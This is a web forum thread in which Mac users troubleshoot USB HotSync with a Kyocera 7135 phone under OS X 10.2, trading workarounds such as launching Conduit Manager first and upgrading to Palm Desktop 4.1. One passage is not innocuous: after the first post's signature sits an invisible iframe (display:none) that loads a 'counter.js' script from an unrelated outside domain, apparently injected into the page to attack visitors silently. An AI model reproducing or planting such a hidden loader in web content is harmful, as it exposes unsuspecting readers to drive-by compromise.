+ Reply to Thread
Page 1 of 2 1 2 LastLast
    db

anyone syncing mac OSX with the usb connector?

i'm using mac os X (10.2.5). i was unable to get hot sync manager to find the usb connection. i had usb checked with the connection settings. it works fine with the serial connector and keyspan serial to usb converter (with that port selected under connection settings). it would be nice to be able to use the true usb cable for travel instead of the lugging the whole cradle.

thanks,
    -db<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

it won't see the phone until you actually hotsync by either using the icon on the phone's screen or pushing the cradle button. the "Palm Device" won't show up on a PC's device manager until you do the same thing.
    LART 'em all! Let /root grep 'em out!

When I got the phone, I hooked up the usb connector to my Powerbook with Mac OS X 10.2.5 and it was recognized right away. I didn't want to hook up my serial adapter again so I was happy and it works almost everytime I plugged it in.

Originally posted by I_Machine
    it won't see the phone until you actually hotsync by either using the icon on the phone's screen or pushing the cradle button.
    Same problem with my Clie...

I have had no problem using the usb on the mac using isync. I am syncing my address book and ical with my phone. I have OSX 10.2.5
    Linda

17" powerbook OSX

USB is not reliable so far for me in 2 wks use. Mac OS X 10.2.5 (same under 10.2.4 fwiw). USB works about 1/3 of the time. I am trying lower speeds to see if that helps over time. I am down to 38.4k as 57.6k failed a bit ago. I have both USB 1.0 and 2.0 hardware and both fail alike. Serial works reliably tho that failed once even above 57.6k. Something is not right in this phone.

one thing i did notice is you have to have palmdesktop for the 7135 installed(came with the phone). regular palm desktop will not synch with osx.:alieneyes

i too have problems with USB sync (MacOS X 10.2.5). And I'm using the Kyocera-supplied Palm desktop and synchronization software (not Apple's iSync). It seems to work 1 in 4 times. No apparent pattern. Pushing the Sync button on the cradle successfully launches the HotSync application, but then it gets hung in "preparing to synchronize".

At first it seemed that powering the phone off would get it to sync, but this appears to be random.
    And I downloaded the latest USB drivers posted on this forum, and that didn't change anything.

Any help would be greatly appreciated!

DRS
    Pushing the Sync button on the cradle successfully launches the HotSync application, but then it gets hung in "preparing to synchronize".
    I get the same thing. For me, hitting cancel on the computer, then hitting cancel on the phone and trying again seems to get it to work.

Got your answer here....

kinda.

It happens because, for some reason, its taking the computer's hotsync too long to get started, and the palm side times out.
    The pseudo-solution is to start up the conduit manager applicaton (that starts the sync going) and then hit the hotsync button on the kyocera base. This gives the app a head start and everything works. I have 100% success this way.

I dunno about you guys, but Im running an old 400mhz G4 (10.2.5), and maybe thats the issue...things are just too damn slow on the get-go. Its too bad because it obviously just needs to be sped up one second or so for things to work fine.
    "Why all the pearls, why the blue hair, why anything!?"

Thanks Azzy!

Firing up Conduit Mgr first solves it for me as well. Now I can sync at full 230k USB speeds. Ahhhhh!

Hopefully Kyocera can & will tweak the HotSync software in the phone to give the Mac more time to respond so that this workaround isn't a permanent solution.

NO problem! Just out of curosity, what kind/speed mac do you have...I have a feeling this is processor related.

Originally posted by Azzy
    NO problem! Just out of curosity, what kind/speed mac do you have...I have a feeling this is processor related.
    Happens to me also but I just quit the sync (failed one if it doesn't pick right up) and use the Palm screen to sync.

I have an 800mhz iBook with 640 RAM.

> NO problem! Just out of curosity,
    > what kind/speed mac do you have

T-book G4-800. And, what-do-ya-know, I just tried your suggestion of first starting the conduit manage, and voila! worked perfectly. Thank you, thank you!

Though I have another curious situation: before learning about yoru work-around, I found that my 7135 had its keyboard and touch-screen freeze after a hung sync attempt. This is repeatable. If I try to sync without first launching conduit manager, once it hangs, I can't "cancel", nor can I respond "ok" once the phone times out and tells me the connection was lost. Only a soft reset will snap it out of it.

Originally posted by zolot
    If I try to sync without first launching conduit manager, once it hangs, I can't "cancel", nor can I respond "ok" once the phone times out and tells me the connection was lost. Only a soft reset will snap it out of it.
    Just wait a sec. Mine does the same thing, but it will pop out of it after 20 seconds or so.

LVC

OSX sync problems 4.1 fixes issues

download and install new Palm desktop 4.1 (just released today) This fixes hot sync tiime out issues with Kyocera 4.0 desktop that comes with kyocera phone Link: http://www.palm.com/support/macintosh/mac_desktop.html

Tim

4.1 fixed all my USB sync problems with OS X!

Thanks for the tip! I had been struggling with USB synchronization on my iBook ever since I got the device. To be brief...
    HotSync worked only intermittently, sometimes using the tricks mentioned in this thread. HotSync never worked with the cradle button; any success at all came with the HotSync app on the 7135. After tapping the HotSync icon on the 7135 HotSync app, it would usually get the computer to launch the conduit manager, but after the "preparing to synchronize..." dialog, nothing would happen. One out of maybe 10-15 times, it would work. Usually, I would have to cancel by tapping the "cancel" button. Occasionally, it would freeze, requiring a soft reset. No real pattern was discernible. I had reinstalled the Kyocera supplied Palm Desktop to no avail. I had given up. But I installed 4.1 and it appears as though that problem is fixed! I've synced about a dozen times tonight using the cradle button without the problem I have described above. I did have to reinstall iSync and the iSync conduit. It acted funny the first couple of times (very slow and log message said: iSync conduit failed), but it seems to be working now.
    Anyway, small price to pay. Thanks again. This has relieved about 2 months worth of frustration. It's funny that although I've had this irritating issue, I really love the phone. And I've only scratched the surface of its capabilities.

db

4.1 worked for me too!

i had tried the suggestion to start conduit manager first, without success. after installing palm desktop 4.1, i had my first successful usb hotsync. i've now ordered the true usb cable so i can keep my cradle at the office.

fwiw: i have an 867 g4 running os 10.2.5.

AND i LOVE my new kyo.

thanks all!

-db

Hotsync MacOS 10.2.6

I seem to still be totally in the dark having yet to achieve a hot sync on 10.2.6. I have tried all the suggestions you guys have made but somewhere somehow I have it wrong.

Any one care to spoon fed me through it?
    Chris

Here is a slightly related question for ya...

I just switched back to Mac from a Toshiba Tablet PC (which is for sale by the way). My Mac is a G3 600 iBook with OSX 10.2.6 that I will need to use till I close on a new house, then a new 15" G4 is planned.

I wanted to sync the Kyocera 7135 with MS Office X's Entourage (like outlook), but from the instructions on how to import my old Windows Outlook 2000 data "outlook.pst" file from a windows, it looks like I need to be using MS Exchange Server and move the pst file's data to the server first.

I don't have an MS exchange server. I just use outlook on my PC with a personal outlook.pst datafile for all my 4500 contacts and email, and it is like 178mb in size, and I don't want to export everything as text. I don't want to transport the contact data from the 7135 into the Mac, because I will lose some of the contact information fields during the sync from 7135 to Palm desktop (or with iSync and the Mac Address book app) because not all the filelds in outlook 2000 make it into the 7135.

Is Virtual PC really the only way I can share my outlook.pst datafile with my desktop PC at home and the one at work and my iBook for when I am mobile?

I found out the hard way that Quicken for Mac doesn't directly read PC Quicken files like the guy at CompUSA said, and I need to try to get a return on it since I never installed it.

Thanks in advance,

Larry
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16